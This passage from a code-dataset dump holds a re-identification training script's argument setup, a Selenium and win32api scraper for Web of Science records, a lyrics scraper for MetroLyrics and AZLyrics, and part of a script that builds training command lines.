type=eval, default=False, help='Either True or False')\n parser.add_argument('--src_ps_lw', type=float, default=0)\n parser.add_argument('--cd_ps_lw', type=float, default=0)\n parser.add_argument('--only_test', type=eval, default=False, help='Either True or False')\n parser.add_argument('--model_weight_file', type=str, default='')\n parser.add_argument('--testset_names', type=CommaSeparatedSeq(list, str), default=['market1501', 'cuhk03', 'duke', 'msmt17'])\n parser.add_argument('--ps_head_arch', type=str, default='PartSegHeadDeconvConv')\n parser.add_argument('--ps_fuse_type', type=str, default='None')\n parser.add_argument('--use_feat_cache', type=str2bool, default=False)\n parser.add_argument('--test_which_feat', type=int, default=-1, help='Either -1 or one of 1,2,3,4,5,6,7,8')\n parser.add_argument('--ps_label_root', type=str, default='None')\n\n args = parser.parse_args()\n print(args)\n time_start = time.time()\n run(args)\n elapsed = round(time.time() - time_start)\n elapsed = str(datetime.timedelta(seconds=elapsed))\n print('Elapsed {}'.format(elapsed))\n", "sub_path": "mgn_pap_ps_erase_ps_label.py", "file_name": "mgn_pap_ps_erase_ps_label.py", "file_ext": "py", "file_size_in_byte": 31439, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.models.resnet.resnet50", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torchvision.models.resnet.Bottleneck", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 63, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 63, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 63, "usage_type": "call"}, {"api_name": "torchvision.models.resnet.Bottleneck", "line_number": 64, "usage_type": "call"}, {"api_name": "torchvision.models.resnet.Bottleneck", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 71, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 71, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 77, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 77, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 81, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 83, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 84, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 85, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm2d", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 88, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 90, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 91, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 92, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 93, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 94, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 95, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 96, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 102, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 108, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 110, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 110, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 124, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 125, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 126, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 127, "usage_type": "call"}, {"api_name": "torch.nn.init.normal_", "line_number": 140, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 140, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 140, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 141, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 141, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 145, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 145, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 145, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 146, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 146, "usage_type": "name"}, {"api_name": "torch.nn.init.kaiming_normal_", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 150, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 150, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 151, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 152, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 152, "usage_type": "name"}, {"api_name": "torch.nn.init.normal_", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.init.constant_", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "name"}, {"api_name": "pa_pool.pa_max_pool", "line_number": 176, "usage_type": "call"}, {"api_name": "torch.nn.functional.max_pool2d", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 180, "usage_type": "name"}, {"api_name": "pa_pool.pa_max_pool", "line_number": 185, "usage_type": "call"}, {"api_name": "torch.nn.functional.max_pool2d", "line_number": 189, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 189, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 225, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 240, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 247, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 293, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 293, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Resize", "line_number": 299, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 299, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomCrop", "line_number": 299, "usage_type": "call"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 301, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 301, "usage_type": "name"}, {"api_name": "random_erasing_w_ps_label.RandomErasingWithPS", "line_number": 303, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 304, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 304, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 305, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 305, "usage_type": "name"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 338, "usage_type": "call"}, {"api_name": "msmt17_erase_ps_label.MSMT17", "line_number": 352, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 364, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.RandomIdSampler", "line_number": 365, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 373, "usage_type": "call"}, {"api_name": "msmt17_erase_ps_label.MSMT17", "line_number": 375, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 378, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 382, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 382, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 383, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 383, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 384, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 384, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 385, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 385, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 387, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 387, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 388, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 388, "usage_type": "name"}, {"api_name": "torchvision.transforms.functional.hflip", "line_number": 389, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.functional", "line_number": 389, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 390, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 390, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 391, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 391, "usage_type": "name"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 395, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 396, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 397, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 398, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 400, "usage_type": "call"}, {"api_name": "market1501_erase_ps_label.Market1501", "line_number": 401, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 402, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 403, "usage_type": "call"}, {"api_name": "msmt17_erase_ps_label.MSMT17", "line_number": 409, "usage_type": "name"}, {"api_name": "partial_reid.PartialREID", "line_number": 412, "usage_type": "name"}, {"api_name": "partial_ilids.PartialiLIDs", "line_number": 414, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 419, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 420, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 424, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 425, "usage_type": "call"}, {"api_name": "torch.cuda.device_count", "line_number": 438, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 438, "usage_type": "attribute"}, {"api_name": "torch.nn.DataParallel", "line_number": 439, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 439, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 441, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 441, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 442, "usage_type": "name"}, {"api_name": "easy2hard_triplet.TripletSemihardLoss", "line_number": 443, "usage_type": "call"}, {"api_name": "ps_loss.PSLoss", "line_number": 444, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 446, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 446, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 447, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 447, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 448, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 448, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 448, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 449, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 449, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 449, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 466, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 470, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 470, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 470, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 472, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 473, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 479, "usage_type": "call"}, {"api_name": "os.path", "line_number": 479, "usage_type": "attribute"}, {"api_name": "file_utils.load_pickle", "line_number": 480, "usage_type": "call"}, {"api_name": "file_utils.save_pickle", "line_number": 492, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 502, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.normalize", "line_number": 503, "usage_type": "call"}, {"api_name": "np_distance.compute_dist_with_visibility", "line_number": 513, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cdist", "line_number": 515, "usage_type": "call"}, {"api_name": "__init__.cmc", "line_number": 516, "usage_type": "call"}, {"api_name": "__init__.mean_ap", "line_number": 520, "usage_type": "call"}, {"api_name": "torch.optim.SGD", "line_number": 543, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 543, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 544, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 544, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 604, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 636, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 637, "usage_type": "call"}, {"api_name": "time.time", "line_number": 667, "usage_type": "call"}, {"api_name": "time.time", "line_number": 669, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 670, "usage_type": "call"}]} +{"seq_id": "200438019", "text": "from re import L\r\nimport requests\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium import webdriver\r\nfrom lxml import etree\r\nimport os\r\nfrom time import sleep\r\nimport xlrd\r\nimport win32api\r\nimport win32con\r\nimport xlsxwriter as xw\r\nfrom openpyxl import load_workbook\r\n\r\ndef Load_number_ExcelDone(path,list,n=0):\r\n data=xlrd.open_workbook(path)\r\n table=data.sheets()[0]\r\n nrows=table.nrows\r\n for i in range(nrows):\r\n try:list.append(int(float(table.row_values(i)[n])))\r\n except:\r\n continue\r\n print(list)\r\n\r\ndef load_Content_Excel(path,lists,number=9999,n=7):\r\n data=xlrd.open_workbook(path)\r\n table=data.sheets()[0]\r\n nrows=table.nrows\r\n if nrows>number:\r\n nrows=number\r\n for i in range(nrows):\r\n if i<=1:\r\n continue\r\n elif table.row_values(i)[n]==table.row_values(i-1)[n]:\r\n continue\r\n else :\r\n s=paper(i,table.row_values(i)[n],0,0)\r\n lists.append(s)\r\n\r\ndef add_information_excel(filepath,paper):\r\n workbook=load_workbook(filepath+'.xlsx')\r\n wb=workbook.active\r\n for p in paper:\r\n column_n='A'+str(p.n)\r\n column_name='B'+str(p.n)\r\n column_wos='C'+str(p.n)\r\n column_url='D'+str(p.n)\r\n wb[column_n]=p.n\r\n wb[column_name]=p.name\r\n wb[column_wos]=p.wos\r\n wb[column_url]=p.url\r\n workbook.save(filepath+'.xlsx')\r\n\r\ndef savepage_pywin32():\r\n win32api.keybd_event(17, 0, 0, 0) # 按下ctrl\r\n win32api.keybd_event(83, 0, 0, 0) # 按下s\r\n win32api.keybd_event(83, 0, win32con.KEYEVENTF_KEYUP, 0) # 释放s\r\n\r\n sleep(1)\r\n\r\n win32api.keybd_event(86, 0, 0, 0) # 按下v\r\n win32api.keybd_event(17, 0, win32con.KEYEVENTF_KEYUP, 0) # 释放ctrl\r\n\r\n sleep(1)\r\n win32api.keybd_event(13, 0, 0, 0) # 按下enter\r\n win32api.keybd_event(13, 0, win32con.KEYEVENTF_KEYUP, 0) # 释放enter\r\n\r\ndef search(kw):\r\n #seach in sci\r\n search_input=brs.find_element_by_xpath('//input[@data-ta=\"search-criteria-input\"]') \r\n try: \r\n wind=brs.find_element_by_id('pendo-close-guide-8fdced48')\r\n wind.click() #find serch box\r\n search_input.click()\r\n search_input.clear()\r\n search_input.send_keys(kw) \r\n search_input.send_keys(Keys.ENTER) #input keywords\r\n butn=brs.find_element_by_xpath('//span[@class=\"mat-button-wrapper\"]') #find search button\r\n butn.click() \r\n except:\r\n search_input.click()\r\n search_input.clear()\r\n search_input.send_keys(kw) \r\n search_input.send_keys(Keys.ENTER) #input keywords\r\n butn=brs.find_element_by_xpath('//span[@class=\"mat-button-wrapper\"]') #find search button\r\n butn.click() #click serch button and serch \r\n\r\ndef closewind(s):\r\n brs.find_element_by_id(s).click\r\n\r\ndef getpaper_wos_url(source):\r\n tree=etree.HTML(source)\r\n download=tree.xpath('//app-records-list//a[@data-ta=\"summary-record-title-link\"]/@href')[0]\r\n Download='https://www.webofscience.com'+download\r\n return Download\r\n\r\ndef getHTML(url,headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36'}):\r\n c=requests.get(url=url,headers=headers).content\r\n return c\r\n\r\ndef getfulltext_url(page):\r\n tree=etree.HTML(page)\r\n c=tree.xpath('//app-full-record-links//a/@href')[0]\r\n return c\r\n\r\ndef getsource(url,broser):\r\n broser.get(url)\r\n page_text=broser.page_source\r\n print('page_souce load successful')\r\n return page_text\r\n\r\ndef SaveHtml(HTML,Filename):\r\n if not os.path.exists('./paper/HTML'):\r\n os.makedirs('./paper/HTML')\r\n Filename=Filename+'.html'\r\n with open('./paper/HTML/'+Filename,'wb',encoding='utf-8') as fp:\r\n fp.write(HTML)\r\n return 'save successful'\r\n\r\n\r\ndef judge_filename(n):\r\n c=n-n%50\r\n # print(c)\r\n d=c+50\r\n X=str(c)+'-'+str(d)+'/'\r\n return X\r\n\r\n\r\n\r\nclass paper:\r\n def __init__(self,n,name,wos,url):\r\n self.n=n\r\n self.name=name\r\n self.wos=wos\r\n self.url=url\r\n\r\n\r\n\r\n\r\nbrs = webdriver.Chrome(executable_path='./chromedriver/chromedriver')\r\n# brs.quit()\r\nurl='https://www.webofscience.com/wos/woscc/basic-search'\r\n", "sub_path": "paper-ssr1.0/#code/defination.py", "file_name": "defination.py", "file_ext": "py", "file_size_in_byte": 4473, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "xlrd.open_workbook", "line_number": 15, "usage_type": "call"}, {"api_name": "xlrd.open_workbook", "line_number": 25, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 40, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 54, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 55, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 56, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 56, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 58, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 60, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 61, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 61, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 64, "usage_type": "call"}, {"api_name": "win32api.keybd_event", "line_number": 65, "usage_type": "call"}, {"api_name": "win32con.KEYEVENTF_KEYUP", "line_number": 65, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 76, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 76, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.keys.Keys.ENTER", "line_number": 83, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.keys.Keys", "line_number": 83, "usage_type": "name"}, {"api_name": "lxml.etree.HTML", "line_number": 91, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 91, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "lxml.etree.HTML", "line_number": 101, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 101, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path", "line_number": 112, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 113, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 139, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 139, "usage_type": "name"}]} +{"seq_id": "171700392", "text": "from bs4 import BeautifulSoup\nfrom requests import get\nfrom requests.exceptions import RequestException\nfrom contextlib import closing\n\n\nheaders = {\n\t\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36\"\n}\n\ndef make_url_metro(song_title, artist_name):\n\treturn 'http://www.metrolyrics.com/' + song_title.replace(' ', '-') + '-lyrics-' + artist_name.replace(' ', '-')\n\ndef make_url_az(song_title, artist_name):\n\treturn f'https://www.azlyrics.com/lyrics/{artist_name}/{song_title}.html'\n\ndef simple_get(url):\n\ttry:\n\t\twith closing(get(url, headers=headers)) as resp:\n\t\t\t# print(resp.status_code, resp.history)\n\t\t\tif resp.status_code == 200:\n\t\t\t\tif not resp.history:\n\t\t\t\t\treturn resp.content\n\t\t\t\telif resp.history[0].status_code == 301:\n\t\t\t\t\treturn resp.content\n\t\t\t\telse:\n\t\t\t\t\tprint('Redirection -> 302: lyrics not found!')\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint('Err -> 404: lyrics not found!')\n\t\t\t\treturn None\n\n\texcept RequestException:\n\t\tprint('Internet connection is needed to download the lyrics')\n\t\treturn None\n\n\ndef lyricsFinderMetro(song_title, artist_name):\n\turl = make_url_metro(song_title.strip(), artist_name.strip())\n\traw_html = simple_get(url)\n\tif raw_html is None:\n\t\tprint('lyrics Not Found.')\n\t\treturn None\n\n\thtml = BeautifulSoup(raw_html, 'html.parser')\n\t\n\tlyrics = ''\n\n\tfor p in html.select('p'):\n\t\ts = [str(i) for i in p.contents]\n\t\ts = ''.join(s)\n\t\ts = s.replace('
', '

')\n\t\tif p.has_attr('class') and p['class'][0] == 'verse':\n\t\t\tlyrics += '

{}

'.format(s)\n\t\t\tif p.findAll('br'):\n\t\t\t\tlyrics += '
'\n\n\treturn lyrics\n\n\ndef lyricsFinderAz(song_title, artist_name):\n\tsong_title = song_title.replace(\"'\", \"\")\n\tsong_title = ''.join(song_title.strip().lower().split())\n\tartist_name = ''.join(artist_name.strip().lower().split())\n\tprint(song_title, artist_name)\n\turl = make_url_az(song_title, artist_name)\n\traw_html = simple_get(url)\n\tif raw_html is None:\n\t\tprint('lyrics Not Found.')\n\t\treturn None\n\n\thtml = BeautifulSoup(raw_html, 'html.parser')\n\n\tlyrics = ''\n\tfor div in html.select('div'):\n\t\tif not div.has_attr('class'):\n\t\t\tlyrics = str(div)\n\n\treturn lyrics\n\n\n\n\n\n\n\n", "sub_path": "friends_fire/lyricsFinder.py", "file_name": "lyricsFinder.py", "file_ext": "py", "file_size_in_byte": 2196, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "contextlib.closing", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.exceptions.RequestException", "line_number": 33, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "521388867", "text": "import argparse\nimport os\nimport datetime\nimport json\nimport subprocess\n\ndef create_cmd(data, path):\n cmd = (\"python3 train.py -g \"+data[\"game\"]+\" -df \"+path+\"/\"+\n \" --e \"+str(data[\"e\"])+\n \" --alpha \"+str(data[\"alpha\"])+\n \" -lr \"+str(data[\"initial_lr\"])+\n \" -lra \"+str(data[\"lr_annealing_steps\"])+\n \" --entropy \"+str(data[\"entropy_regularisation_strength\"])+\n \" --clip_norm \"+str(data[\"clip_norm\"])+\n \" --clip_norm_type \"+str(data[\"clip_norm_type\"])+\n \" --gamma \"+str(data[\"gamma\"])+\n \" --max_global_steps \"+str(data[\"max_global_steps\"])+\n \" --max_local_steps \"+str(data[\"max_local_steps\"])+\n \" --arch \"+str(data[\"arch\"])+\n \" -ec \"+str(data[\"emulator_counts\"])+\n \" -ew \"+str(data[\"emulator_workers\"])+\n \" --epsilon \"+str(data[\"epsilon\"])+\n \" --softmax_temp \"+str(data[\"softmax_temp\"])+\n \" --annealed_steps \"+str(data[\"annealed_steps\"])+\n \" --keep_percentage \"+str(data[\"keep_percentage\"])+\n \" --max_repetition \"+str(data[\"max_repetition\"])+\n \" --nb_choices \"+str(data[\"nb_choices\"])+\n \" --checkpoint_interval \"+str(data[\"checkpoint_interval\"])+\n \" --activation \"+str(data[\"activation\"])+\n \" --alpha_leaky_relu \"+str(data[\"alpha_leaky_relu\"]))\n if data[\"single_life_episodes\"] : cmd += \" --single_life_episodes\"\n if data[\"random_start\"] : cmd += \" --random_start\"\n if data[\"egreedy\"] : cmd += \" --egreedy\"\n if data[\"annealed\"] : cmd += \" --annealed\"\n if data[\"rgb\"] : cmd += \" --rgb\"\n return cmd\n\ndef create_chpt_cmd(args, path):\n cmd = (\"nohup python3 scripts/checkpoints.py \"+\n \" -df \"+path+\"/\"\n \" -t \"+str(args.time)+\n \" &> nohupLogs/saveCheckpoints.out &\")\n return cmd\n\n\ndef main(args):\n pathSrc = args.folder\n for folder in os.listdir(pathSrc):\n i = 